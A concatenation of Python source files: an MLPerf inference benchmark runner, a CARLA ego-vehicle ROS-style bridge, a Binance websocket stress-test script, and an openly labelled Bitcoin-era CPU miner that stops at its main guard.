    parser.add_argument("--model", required=True, help="model file")
    parser.add_argument("--inputs", help="model inputs")
    parser.add_argument("--output", help="test results")
    parser.add_argument("--outputs", help="model outputs")
    parser.add_argument("--backend", help="runtime to use")
    parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
    parser.add_argument("--time", type=int, help="time to scan in seconds")
    parser.add_argument("--count", type=int, help="dataset items to use")
    parser.add_argument("--qps", type=int, default=10, help="target qps")  # TODO: remove once we have qps scan
    parser.add_argument("--max-latency", type=str, help="max latency in 99pct tile")
    parser.add_argument("--cache", type=int, default=0, help="use cache")
    args = parser.parse_args()

    # don't use defaults in argparser. Instead we default to a dict, override that with a profile
    # and take this as default unless command line give
    # FIX: work on a copy -- the original `defaults.update(profile)` mutated
    # the shared SUPPORTED_PROFILES["defaults"] table, corrupting later calls.
    defaults = dict(SUPPORTED_PROFILES["defaults"])
    if args.profile:
        profile = SUPPORTED_PROFILES[args.profile]
        defaults.update(profile)
    for k, v in defaults.items():
        kc = k.replace("-", "_")
        if getattr(args, kc) is None:
            setattr(args, kc, v)

    # comma-separated option strings -> python lists
    if args.inputs:
        args.inputs = args.inputs.split(",")
    if args.outputs:
        args.outputs = args.outputs.split(",")
    if args.max_latency:
        args.max_latency = [float(i) for i in args.max_latency.split(",")]
    return args
def get_backend(backend):
    """Instantiate the requested inference backend.

    Backend modules are imported lazily so only the selected backend's
    dependencies need to be installed.

    :param backend: one of "tensorflow", "onnxruntime", "null",
        "pytorch", "tflite"
    :return: a freshly constructed backend instance
    :raises ValueError: for an unrecognized backend name
    """
    if backend == "tensorflow":
        from backend_tf import BackendTensorflow as backend_cls
    elif backend == "onnxruntime":
        from backend_onnxruntime import BackendOnnxruntime as backend_cls
    elif backend == "null":
        from backend_null import BackendNull as backend_cls
    elif backend == "pytorch":
        from backend_pytorch import BackendPytorch as backend_cls
    elif backend == "tflite":
        from backend_tflite import BackendTflite as backend_cls
    else:
        raise ValueError("unknown backend: " + backend)
    return backend_cls()
class Item:
    """A unit of work queued for processing by the worker thread pool.

    Captures its creation time so queue latency can be measured downstream.
    """

    def __init__(self, query_id, content_id, img, label=None):
        self.query_id = query_id      # loadgen query id(s) for this item
        self.content_id = content_id  # dataset item index(es)
        self.img = img                # preprocessed image data
        self.label = label            # ground-truth label(s), if available
        self.start = time.time()      # enqueue timestamp
class Runner:
    """Thread pool that runs model predictions for queued loadgen items.

    Workers pull Item objects from a bounded queue, run the backend model
    and report completion to loadgen via QuerySamplesComplete.
    """
    def __init__(self, model, ds, threads, post_proc=None):
        # bounded queue so enqueue() blocks instead of growing without limit
        self.tasks = Queue(maxsize=threads * 5)
        self.workers = []
        self.model = model
        # NOTE(review): `ds` is accepted but never stored/used here
        self.post_process = post_proc
        self.threads = threads
        self.result_dict = {}
        self.take_accuracy = False
    def handle_tasks(self, tasks_queue):
        """Worker thread."""
        while True:
            qitem = tasks_queue.get()
            if qitem is None:
                # None in the queue indicates the parent want us to exit
                tasks_queue.task_done()
                break
            try:
                # run the prediction
                results = self.model.predict({self.model.inputs[0]: qitem.img})
                if self.take_accuracy:
                    # NOTE(review): this return value is immediately discarded --
                    # `response` is unconditionally rebuilt in the finally block
                    response = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
            except Exception as ex:  # pylint: disable=broad-except
                log.error("execute_parallel thread: %s", ex)
            finally:
                response = []
                for query_id in qitem.query_id:
                    # FIXME: unclear what to return here
                    response.append(lg.QuerySampleResponse(query_id, 0, 0))
                lg.QuerySamplesComplete(response)
                tasks_queue.task_done()
    def start_pool(self):
        # spawn daemon workers so they never block interpreter shutdown
        for _ in range(self.threads):
            worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
            worker.daemon = True
            self.workers.append(worker)
            worker.start()
    def start_run(self, result_dict, take_accuracy):
        # reset per-run accounting and (re)start the post-processor
        self.result_dict = result_dict
        self.take_accuracy = take_accuracy
        self.post_process.start()
    def enqueue(self, id, ids, data, label):
        # note: `id` shadows the builtin; kept for caller compatibility
        item = Item(id, ids, data, label)
        self.tasks.put(item)
    def finish(self):
        # exit all threads: one None sentinel per worker, then join them
        for _ in self.workers:
            self.tasks.put(None)
        for worker in self.workers:
            worker.join()
def add_results(final_results, name, result_dict, result_list, took):
    """Summarize one benchmark run and store it under ``name``.

    Derives latency percentiles, throughput and accuracy from the raw
    per-query latencies in ``result_list`` and the good/total counters in
    ``result_dict``, records the summary in ``final_results`` and prints a
    one-line digest to stdout.
    """
    percentiles = [50., 80., 90., 95., 99., 99.9]
    buckets = np.percentile(result_list, percentiles).tolist()
    buckets_str = ",".join(
        "{}:{:.4f}".format(pct, val) for pct, val in zip(percentiles, buckets))

    # this is what we record for each run
    summary = {
        "mean": np.mean(result_list),
        "took": took,
        "qps": len(result_list) / took,
        "count": len(result_list),
        "percentiles": dict(zip(map(str, percentiles), buckets)),
        "good_items": result_dict["good"],
        "total_items": result_dict["total"],
        "accuracy": 100. * result_dict["good"] / result_dict["total"],
    }
    if "mAP" in result_dict:
        summary["mAP"] = result_dict["mAP"]

    # add the result to the result dict
    final_results[name] = summary

    # one-line digest to stdout
    print("{} qps={:.2f}, mean={:.6f}, time={:.2f}, acc={:.2f}, queries={}, tiles={}".format(
        name, summary["qps"], summary["mean"], took, summary["accuracy"], len(result_list), buckets_str))
def main():
    """Run the mlperf inference benchmark over the configured scenarios
    and latency targets, then write aggregated results as JSON."""
    args = get_args()
    log.info(args)
    # find backend
    backend = get_backend(args.backend)
    # override image format if given
    image_format = args.data_format if args.data_format else backend.image_format()
    # dataset to use
    wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
    ds = wanted_dataset(data_path=args.dataset_path,
                        image_list=args.dataset_list,
                        name=args.dataset,
                        image_format=image_format,
                        pre_process=pre_proc,
                        use_cache=args.cache,
                        count=args.count, **kwargs)
    # load model to backend
    model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
    final_results = {
        "runtime": model.name(),
        "version": model.version(),
        "time": int(time.time()),
        "cmdline": str(args),
    }
    #
    # make one pass over the dataset to validate accuracy
    #
    count = args.count if args.count else ds.get_item_count()
    runner = Runner(model, ds, args.threads, post_proc=post_proc)
    runner.start_pool()
    # warmup: repeatedly predict the first sample to warm caches/JITs
    log.info("warmup ...")
    ds.load_query_samples([0])
    for _ in range(50):
        img, _ = ds.get_samples([0])
        _ = backend.predict({backend.inputs[0]: img})
    ds.unload_query_samples(None)
    def issue_query(query_samples):
        # loadgen callback: fetch samples and hand them to the worker pool
        idx = [q.index for q in query_samples]
        query_id = [q.id for q in query_samples]
        data, label = ds.get_samples(idx)
        runner.enqueue(query_id, idx, data, label)
    def process_latencies(latencies_ns):
        # loadgen callback: stash latencies for add_results() below
        global last_timeing
        # NOTE(review): divisor is 1e7, but the inputs are nanoseconds and
        # NANO_SEC is 1e9 -- confirm whether this off-by-100 is intended
        last_timeing = [t / 10000000. for t in latencies_ns]
    sut = lg.ConstructSUT(issue_query, process_latencies)
    qsl = lg.ConstructQSL(count, count, ds.load_query_samples, ds.unload_query_samples)
    scenarios = [
        lg.TestScenario.SingleStream,
        lg.TestScenario.MultiStream,
        lg.TestScenario.Server,
        # lg.TestScenario.Offline,
    ]
    # run every scenario against every requested latency target
    for scenario in scenarios:
        for target_latency in args.max_latency:
            log.info("starting {}, latency={}".format(scenario, target_latency))
            settings = lg.TestSettings()
            settings.scenario = scenario
            if args.qps:
                settings.enable_spec_overrides = True
                qps = float(args.qps)
                settings.server_target_qps = qps
                settings.offline_expected_qps = qps
            if args.time:
                # bound the run by wall time and a matching query count
                settings.enable_spec_overrides = True
                settings.override_min_duration_ms = args.time * MILLI_SEC
                settings.override_max_duration_ms = args.time * MILLI_SEC
                qps = args.qps or 100
                settings.override_min_query_count = qps * args.time
                settings.override_max_query_count = qps * args.time
            if args.time or args.qps:
                settings.mode = lg.TestMode.PerformanceOnly
            # FIXME: add SubmissionRun once available
            settings.enable_spec_overrides = True  # FIXME: needed because of override_target_latency_ns
            settings.single_stream_expected_latency_ns = int(target_latency * NANO_SEC)
            settings.override_target_latency_ns = int(target_latency * NANO_SEC)
            # reset result capture
            result_dict = {"good": 0, "total": 0}
            runner.start_run(result_dict, True)
            start = time.time()
            lg.StartTest(sut, qsl, settings)
            # aggregate results (last_timeing was filled by process_latencies)
            post_proc.finalize(result_dict, ds)
            add_results(final_results, "{}-{}".format(scenario, target_latency),
                        result_dict, last_timeing, time.time() - start)
    #
    # write final results
    #
    if args.output:
        with open(args.output, "w") as f:
            json.dump(final_results, f, sort_keys=True, indent=4)
    runner.finish()
    lg.DestroyQSL(qsl)
    lg.DestroySUT(sut)
if __name__ == "__main__":
    main()
|
ego_vehicle.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Classes to handle Carla vehicles
"""
import math
import numpy
from icvSubscriber import Subscriber
#import rospy
from protocol.std_msgs.msg import ColorRGBA
from protocol.std_msgs.msg import Bool
from geometry_msgs.msg import Twist
from threading import Thread, Lock, Event
from carla import VehicleControl
from carla import Vector3D
import time
from vehicle import Vehicle
import transforms as transforms
from icvPublisher import Publisher
from icvSubscriber import Subscriber
import threading
from carla_msgs.msg import CarlaEgoVehicleInfo, CarlaEgoVehicleInfoWheel,\
CarlaEgoVehicleControl, CarlaEgoVehicleStatus
class EgoVehicle(Vehicle):
    """
    Vehicle implementation details for the ego vehicle.

    Spawns a background thread that polls the command subscribers every
    Sec_loop seconds and forwards received commands to CARLA.
    """

    def __init__(self, carla_actor, parent, communication, vehicle_control_applied_callback):
        """
        Constructor

        :param carla_actor: carla actor object
        :type carla_actor: carla.Actor
        :param parent: the parent of this
        :type parent: carla_icv_bridge.Parent
        :param communication: communication-handle
        :type communication: carla_icv_bridge.communication
        :param vehicle_control_applied_callback: called with the actor id
            every time a control command has been applied to CARLA
        """
        super(EgoVehicle, self).__init__(carla_actor=carla_actor,
                                         parent=parent,
                                         communication=communication,
                                         prefix=carla_actor.attributes.get('role_name'))
        self.vehicle_info_published = False
        self.vehicle_control_override = False
        self._vehicle_control_applied_callback = vehicle_control_applied_callback
        # command subscribers, polled by _update_commands_thread below
        self.sub1 = Subscriber(self.get_topic_prefix() + "/vehicle_control_cmd")
        self.sub2 = Subscriber(self.get_topic_prefix() + "/vehicle_control_cmd_manual")
        self.sub3 = Subscriber(self.get_topic_prefix() + "/vehicle_control_manual_override")
        self.sub4 = Subscriber(self.get_topic_prefix() + "/enable_autopilot")
        self.sub5 = Subscriber(self.get_topic_prefix() + "/twist_cmd")
        self.Sec_loop = 0.02  # polling period of the command thread [s]
        # message buffers filled by Subscriber.subscribe()
        self.control_subscriber = CarlaEgoVehicleControl()
        self.manual_control_subscriber = CarlaEgoVehicleControl()
        self.control_override_subscriber = Bool()
        self.enable_autopilot_subscriber = Bool()
        self.twist_control_subscriber = Twist()
        self.pub1 = Publisher(self.get_topic_prefix() + "/vehicle_info")
        self.pub2 = Publisher(self.get_topic_prefix() + "/vehicle_status")
        # keep the polling thread alive until destroy() clears this flag
        self._update_commands_active = True
        self.update_command_thread = Thread(target=self._update_commands_thread)
        self.update_command_thread.start()

    def get_marker_color(self):
        """
        Function (override) to return the color for marker messages.
        The ego vehicle uses a different marker color than other vehicles.

        :return: the color used by a ego vehicle marker (green)
        :rtpye : std_msgs.ColorRGBA
        """
        color = ColorRGBA()
        color.r = 0
        color.g = 255
        color.b = 0
        # NOTE(review): alpha channel is left at the message default -- confirm
        return color

    def send_vehicle_msgs(self):
        """
        send messages related to vehicle status

        Publishes the current CarlaEgoVehicleStatus on every call and the
        static CarlaEgoVehicleInfo exactly once (latched behaviour).

        :return:
        """
        vehicle_status = CarlaEgoVehicleStatus(
            header=self.get_msg_header("map"))
        vehicle_status.velocity = self.get_vehicle_speed_abs(self.carla_actor)
        vehicle_status.acceleration.linear = transforms.carla_vector_to_icv_vector_rotated(
            self.carla_actor.get_acceleration(),
            self.carla_actor.get_transform().rotation)
        vehicle_status.orientation = self.get_current_icv_pose().orientation
        # query the control once instead of once per field
        control = self.carla_actor.get_control()
        vehicle_status.control.throttle = control.throttle
        vehicle_status.control.steer = control.steer
        vehicle_status.control.brake = control.brake
        vehicle_status.control.hand_brake = control.hand_brake
        vehicle_status.control.reverse = control.reverse
        vehicle_status.control.gear = control.gear
        vehicle_status.control.manual_gear_shift = control.manual_gear_shift
        self.pub2.publish(vehicle_status)
        # only send vehicle info once (in latched-mode)
        if not self.vehicle_info_published:
            self.vehicle_info_published = True
            vehicle_info = CarlaEgoVehicleInfo()
            vehicle_info.id = self.carla_actor.id
            vehicle_info.type = self.carla_actor.type_id
            vehicle_info.rolename = self.carla_actor.attributes.get('role_name')
            vehicle_physics = self.carla_actor.get_physics_control()
            for wheel in vehicle_physics.wheels:
                wheel_info = CarlaEgoVehicleInfoWheel()
                wheel_info.tire_friction = wheel.tire_friction
                wheel_info.damping_rate = wheel.damping_rate
                wheel_info.max_steer_angle = math.radians(wheel.max_steer_angle)
                vehicle_info.wheels.append(wheel_info)
            # (duplicate max_rpm assignment from the original removed)
            vehicle_info.max_rpm = vehicle_physics.max_rpm
            vehicle_info.moi = vehicle_physics.moi
            vehicle_info.damping_rate_full_throttle = vehicle_physics.damping_rate_full_throttle
            vehicle_info.damping_rate_zero_throttle_clutch_engaged = \
                vehicle_physics.damping_rate_zero_throttle_clutch_engaged
            vehicle_info.damping_rate_zero_throttle_clutch_disengaged = \
                vehicle_physics.damping_rate_zero_throttle_clutch_disengaged
            vehicle_info.use_gear_autobox = vehicle_physics.use_gear_autobox
            vehicle_info.gear_switch_time = vehicle_physics.gear_switch_time
            vehicle_info.clutch_strength = vehicle_physics.clutch_strength
            vehicle_info.mass = vehicle_physics.mass
            vehicle_info.drag_coefficient = vehicle_physics.drag_coefficient
            vehicle_info.center_of_mass.x = vehicle_physics.center_of_mass.x
            vehicle_info.center_of_mass.y = vehicle_physics.center_of_mass.y
            vehicle_info.center_of_mass.z = vehicle_physics.center_of_mass.z
            self.pub1.publish(vehicle_info)

    def update(self, frame, timestamp):
        """
        Function (override) to update this object.
        On update ego vehicle calculates and sends the new values for VehicleControl()

        :return:
        """
        self.send_vehicle_msgs()
        super(EgoVehicle, self).update(frame, timestamp)

    def _update_commands_thread(self):
        """
        Poll the command subscribers every Sec_loop seconds and dispatch any
        pending messages.

        Fixes applied (review):
        * the original body ran only once, so commands after the first
          Sec_loop were never processed -- it now loops until destroy()
        * the twist branch reset sub3 instead of sub5
        """
        while self._update_commands_active:
            time.sleep(self.Sec_loop)
            if self.sub4.getstate():
                self.sub4.reset()
                self.enable_autopilot_updated()
            if self.sub3.getstate():
                self.sub3.reset()
                self.control_command_override()
            if self.sub1.getstate() or self.sub2.getstate():
                self.sub1.reset()
                self.sub2.reset()
                self.control_command_updated()
            if self.sub5.getstate():
                # reset the twist subscriber (the original reset sub3 here)
                self.sub5.reset()
                self.twist_command_updated()

    def destroy(self):
        """
        Function (override) to destroy this object.
        Stops the command polling thread, terminates icv subscriptions and
        finally forwards the call to the super class.

        :return:
        """
        # stop the command polling thread before tearing down the buffers
        self._update_commands_active = False
        self.control_subscriber = None
        self.enable_autopilot_subscriber = None
        self.twist_control_subscriber = None
        self.control_override_subscriber = None
        self.manual_control_subscriber = None
        super(EgoVehicle, self).destroy()

    def twist_command_updated(self):
        """
        Set angular/linear velocity (this does not respect vehicle dynamics)
        """
        if not self.vehicle_control_override:
            # fix: the original referenced the bare name `sub5` (NameError)
            self.sub5.subscribe(self.twist_control_subscriber)
            twist = self.twist_control_subscriber
            angular_velocity = Vector3D()
            angular_velocity.z = math.degrees(twist.angular.z)
            # rotate the commanded linear velocity into the world frame
            rotation_matrix = transforms.carla_rotation_to_numpy_rotation_matrix(
                self.carla_actor.get_transform().rotation)
            linear_vector = numpy.array([twist.linear.x, twist.linear.y, twist.linear.z])
            rotated_linear_vector = rotation_matrix.dot(linear_vector)
            linear_velocity = Vector3D()
            linear_velocity.x = rotated_linear_vector[0]
            linear_velocity.y = -rotated_linear_vector[1]  # icv/carla y-axis flip
            linear_velocity.z = rotated_linear_vector[2]
            self.carla_actor.set_velocity(linear_velocity)
            self.carla_actor.set_angular_velocity(angular_velocity)

    def control_command_override(self):
        """
        Set the vehicle control mode according to icv topic
        """
        self.sub3.subscribe(self.control_override_subscriber)
        # fix: the original statement just read the attribute and discarded
        # the received value; apply the override flag from the message
        self.vehicle_control_override = self.control_override_subscriber.data

    def control_command_updated(self):
        """
        Receive a CarlaEgoVehicleControl msg and send to CARLA

        This function gets called whenever a icv CarlaEgoVehicleControl is received.
        If the mode is valid (either normal or manual), the received icv message is
        converted into carla.VehicleControl command and sent to CARLA.
        This bridge is not responsible for any restrictions on velocity or steering.
        It's just forwarding the icv input to CARLA

        :return:
        """
        # fix: the original referenced the bare names `sub2`/`sub1` (NameError)
        if self.vehicle_control_override:
            self.sub2.subscribe(self.manual_control_subscriber)
            icv_vehicle_control = self.manual_control_subscriber
        else:
            self.sub1.subscribe(self.control_subscriber)
            icv_vehicle_control = self.control_subscriber
        vehicle_control = VehicleControl()
        vehicle_control.hand_brake = icv_vehicle_control.hand_brake
        vehicle_control.brake = icv_vehicle_control.brake
        vehicle_control.steer = icv_vehicle_control.steer
        vehicle_control.throttle = icv_vehicle_control.throttle
        vehicle_control.reverse = icv_vehicle_control.reverse
        self.carla_actor.apply_control(vehicle_control)
        self._vehicle_control_applied_callback(self.get_id())

    def enable_autopilot_updated(self):
        """
        Enable/disable auto pilot

        :return:
        """
        self.sub4.subscribe(self.enable_autopilot_subscriber)
        self.carla_actor.set_autopilot(self.enable_autopilot_subscriber.data)

    @staticmethod
    def get_vector_length_squared(carla_vector):
        """
        Calculate the squared length of a carla_vector

        :param carla_vector: the carla vector
        :type carla_vector: carla.Vector3D
        :return: squared vector length
        :rtype: float64
        """
        return carla_vector.x * carla_vector.x + \
            carla_vector.y * carla_vector.y + \
            carla_vector.z * carla_vector.z

    @staticmethod
    def get_vehicle_speed_squared(carla_vehicle):
        """
        Get the squared speed of a carla vehicle

        :param carla_vehicle: the carla vehicle
        :type carla_vehicle: carla.Vehicle
        :return: squared speed of a carla vehicle [(m/s)^2]
        :rtype: float64
        """
        return EgoVehicle.get_vector_length_squared(carla_vehicle.get_velocity())

    @staticmethod
    def get_vehicle_speed_abs(carla_vehicle):
        """
        Get the absolute speed of a carla vehicle

        :param carla_vehicle: the carla vehicle
        :type carla_vehicle: carla.Vehicle
        :return: speed of a carla vehicle [m/s >= 0]
        :rtype: float64
        """
        speed = math.sqrt(EgoVehicle.get_vehicle_speed_squared(carla_vehicle))
        return speed
|
dev_test_cex_full_non_stop.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_cex_full_non_stop.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import math
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`! https://pypi.org/project/python-binance/#description")
sys.exit(1)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Drain the manager's stream_buffer forever, discarding the payloads.

    Waits 30 seconds before starting so the streams can come up, then polls
    the buffer in a loop; terminates the process once the manager reports
    that it is stopping.
    """
    time.sleep(30)
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            exit(0)
        if binance_websocket_api_manager.pop_stream_data_from_stream_buffer() is False:
            # buffer empty -- back off briefly to avoid busy-waiting
            time.sleep(0.01)
# create instance of BinanceWebSocketApiManager
#binance_websocket_api_manager = BinanceWebSocketApiManager(throw_exception_if_unrepairable=True)
binance_websocket_api_manager = BinanceWebSocketApiManager(throw_exception_if_unrepairable=False)
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
try:
    binance_rest_client = Client(binance_api_key, binance_api_secret)
    # NOTE(review): this creates a SECOND manager, orphaning the instance
    # above whose monitoring API was just started -- confirm this is intended
    binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
    print("No internet connection?")
    sys.exit(1)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# collect all tradable symbols via the REST API
markets = []
data = binance_rest_client.get_all_tickers()
for item in data:
    markets.append(item['symbol'])
private_stream_id = binance_websocket_api_manager.create_stream(["!userData"],
                                                                ["arr"],
                                                                api_key=binance_api_key,
                                                                api_secret=binance_api_secret,
                                                                stream_label="userData stream!")
binance_websocket_api_manager.create_stream(arr_channels, "arr", stream_label="`arr` channels")
# split the market list into chunks that respect the per-stream
# subscription limit; one stream per (channel, chunk)
divisor = math.ceil(len(markets) / binance_websocket_api_manager.get_limit_of_subscriptions_per_stream())
max_subscriptions = math.ceil(len(markets) / divisor)
for channel in channels:
    if len(markets) <= max_subscriptions:
        binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
    else:
        loops = 1
        i = 1
        markets_sub = []
        for market in markets:
            markets_sub.append(market)
            # flush a chunk when it is full or when the tail is reached
            if i == max_subscriptions or loops * max_subscriptions + i == len(markets):
                binance_websocket_api_manager.create_stream(channel, markets_sub,
                                                            stream_label=str(channel + "_" + str(i)))
                markets_sub = []
                i = 1
                loops += 1
            i += 1
# keep the main thread alive and print a status summary every second
while True:
    binance_websocket_api_manager.print_summary()
    time.sleep(1)
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class GencoinRPC:
    """Minimal JSON-RPC 1.1 client for a Gencoin node over HTTP.

    Python 2 code (httplib, print statements).
    """
    OBJID = 1  # request id counter

    def __init__(self, host, port, username, password):
        # HTTP basic-auth header built from username:password
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # non-strict connection with a 30 second timeout
        self.conn = httplib.HTTPConnection(host, port, False, 30)
    def rpc(self, method, params=None):
        """POST one JSON-RPC call and return its 'result' field.

        Returns None on transport/parse problems; on an RPC-level error the
        server's error object is returned instead of the result.
        """
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        # NOTE(review): the error object is returned like a normal result;
        # callers cannot distinguish success from failure here
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']
    def getblockcount(self):
        # convenience wrapper for the 'getblockcount' RPC
        return self.rpc('getblockcount')
    def getwork(self, data=None):
        # 'getwork' fetches work when data is None, submits it otherwise
        return self.rpc('getwork', data)
def uint32(x):
    # truncate to an unsigned 32-bit value
    return x & 0xffffffffL
def bytereverse(x):
    # swap the byte order of a 32-bit word (endianness flip)
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
            (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    # byte-swap each aligned 32-bit word of the buffer in place
    # (buffer length is assumed to be a multiple of 4)
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    # reverse the order of the 32-bit words in the buffer
    # (word contents are untouched; see bufreverse for byte swapping)
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    """One mining worker: fetches work via RPC, scans nonces, submits wins.

    Python 2 code (long literals, xrange, str-as-bytes).
    """
    def __init__(self, id):
        # note: `id` shadows the builtin; kept for interface compatibility
        self.id = id
        self.max_nonce = MAX_NONCE
    def work(self, datastr, targetstr):
        """Scan up to max_nonce nonces for the given work unit.

        Returns (hashes_done, nonce_bin); nonce_bin is None when no nonce
        below the target was found.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]	# byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        # NOTE(review): uses the loop variable after the loop; raises
        # NameError if max_nonce is 0 -- confirm max_nonce stays positive
        return (nonce + 1, None)
    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the work data and push it upstream."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # the nonce occupies hex chars 152..160 of the 256-char data block
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result
    def iterate(self, rpc):
        """One work cycle: fetch work, scan, retune max_nonce, submit."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # adapt the per-iteration scan size so one call takes ~scantime seconds
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)
    def loop(self):
        """Mine forever against the RPC endpoint from the settings dict."""
        rpc = GencoinRPC(settings['host'], settings['port'],
                 settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Process entry point: build one Miner and let it loop forever."""
    # note: `id` shadows the builtin; kept for interface compatibility
    miner = Miner(id)
    miner.loop()
if __name__ == '__main__':
